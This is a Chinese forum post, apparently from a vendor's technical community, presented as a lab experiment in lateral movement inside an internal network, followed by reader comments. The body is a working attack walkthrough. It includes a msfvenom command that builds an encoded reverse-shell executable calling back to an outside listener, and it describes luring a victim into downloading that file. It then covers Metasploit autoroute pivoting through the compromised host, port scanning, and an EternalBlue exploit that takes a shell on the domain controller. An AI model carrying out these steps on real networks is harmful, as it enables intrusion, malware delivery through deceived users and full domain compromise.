×

模拟实验-病毒如何实现内网横向传播。
  

小黑鱼快点游 7846

{{ttag.title}}
描述:
这里利用已经控制的一台计算机作为入侵内网的跳板机,在其他内网主机看来访问全部来自于跳板机。以入侵的点作为一个支点,然后横向攻击对内网不能上网的电脑执行恶意攻击。
环境准备:
路由器1跟路由器2分别部署在网关,做了源地址转换为客户提供上网,其中R1作为黑客的出口边界,黑客为了达到目的,在边界路由器上开了针对于自己攻击机两个端口,80,4444
路由器2部分,只是做了源地址转换,只允许win7的电脑可以上网,其他的电脑均无法上网。win7到内网所有主机都能够正常通信。
实验开始:
1.现在kali上面生成一个恶意程序a.exe,注意这里的lhost要填写R1的wan地址。
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=172.16.0.245 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o .exe
生成之后的程序拷贝的apache目录里面,能够让用户可以正常下载。
2.通过社工等方式发给对方,诱骗让其去下载这个程序,在win7上打开浏览器输入
http://172.16.0.245/a.exe 将程序下载到本地。
3.在kali中通过监听的方式来让win7主动链接自己的4444端口。主要对方点击这个程序即可。
命令:use exploit/multi/handler。注意这里的lhost添加本机即可。如下拿到shell
4.这里添加一条路由,目的是以win7作为跳板机,kali后面要在win7所在的内网其他主机进行横向渗透的时候都通过这个路由将数据包丢给win7,然后在由win7对内网进行攻击。所以这个路由很关键,可以看做是连通到内网的一条隧道。
因为我们已经拿到win7的shell了,所以能够看到win7所在网卡的网段,直接添加路由即可。
命令:run autoroute -s 2.2.2.0/24
5.查看一下路由是否添加成功
命令:run autoroute -p
6.background退出,然后我们内网进行主机在线扫描。看看哪些主机在线。因为扫描会占用太多的时间,这里我们有针对的扫描,地址:2.2.2.9-2.2.2.12 。端口:139,445
命令:use auxiliary/scanner/portscan/tcp
7.看是扫描,能够看到,10/11/12这三个主机存活,其中10主机就是我们的win7电脑这是跳板机不管。9主机是不存活主机。
8.知道哪些主机存活了,接下来我们可以利用永恒之蓝攻击对内网进行继续渗透,拿到更多的shell。
这里我们攻击AD域控12主机。
调整永恒之蓝攻击参数,这里我们的攻击对象是12,但是反弹地址要添加跳板机地址,而且端口要是我们R1上面端口映射的4444端口。
9,执行攻击之后,成功拿到了AD域控的shell
10.此时我们到AD域控上看一下链接端口能够发现,12一直在跟10建立4444端口通信。
11.因为这里在R2设定的是所有主机都可以上网,所以我们做一个拓展,在永恒之蓝攻击模块中,
lhost设定为172.16.0.45R1的WAN口地址。
12.然后开始攻击,这时候kali会将数据包通过之前设定的run autoroute -s 2.2.2.0/24 路由丢给win7,然后在win7将数据包丢给AD,AD直接进行反弹链接172.16.0.45的4444端口,漏洞利用成功。
13.此时我们可以看一下AD上面的端口连接
附:这只是个人认为比较好用的一种方法,如有不同观点或者疑问欢迎来攻,一起进步,谢谢!

打赏鼓励作者,期待更多好文!

打赏
4人已打赏

feeling 发表于 2019-6-29 21:39
  
相当不错
厌児 发表于 2019-6-30 17:03
  
学习了呢  感谢大佬分享
drogba 发表于 2019-7-3 15:33
  
新新向容 发表于 2019-7-3 19:54
  
感谢分享
新手756451 发表于 2019-8-14 13:28
  
感谢分享
新手920702 发表于 2021-1-6 21:32
  

学习了呢  感谢大佬分享
新手569226 发表于 2021-1-28 09:19
  
很完整的分享,非常有用
新手252965 发表于 2021-1-28 09:26
  

谢谢分享!学习了!
新手779293 发表于 2021-3-30 11:31
  
非常实用的案例,感谢楼主分享。
发表新帖
热门标签
全部标签>
西北区每日一问
技术盲盒
安全效果
【 社区to talk】
技术笔记
干货满满
每日一问
信服课堂视频
新版本体验
GIF动图学习
技术咨询
功能体验
2023技术争霸赛专题
产品连连看
安装部署配置
通用技术
秒懂零信任
技术晨报
自助服务平台操作指引
原创分享
标准化排查
排障笔记本
玩转零信任
排障那些事
SDP百科
深信服技术支持平台
POC测试案例
畅聊IT
答题自测
专家问答
技术圆桌
在线直播
MVP
网络基础知识
升级
安全攻防
上网策略
测试报告
日志审计
问题分析处理
流量管理
每日一记
运维工具
云计算知识
用户认证
解决方案
sangfor周刊
VPN 对接
项目案例
SANGFOR资讯
专家分享
技术顾问
信服故事
功能咨询
终端接入
授权
设备维护
资源访问
地址转换
虚拟机
存储
迁移
加速技术
产品预警公告
信服圈儿
S豆商城资讯
技术争霸赛
「智能机器人」
追光者计划
社区帮助指南
答题榜单公布
纪元平台
卧龙计划
华北区拉练
天逸直播
以战代练
山东区技术晨报
文档捉虫活动
齐鲁TV
华北区交付直播
每周精选
2024年技术争霸赛
北京区每日一练
场景专题
故障笔记
高手请过招
升级&主动服务
高频问题集锦
社区新周刊
全能先锋系列
云化安全能力

本版达人

新手68983...

本周分享达人

零和一网络

本周提问达人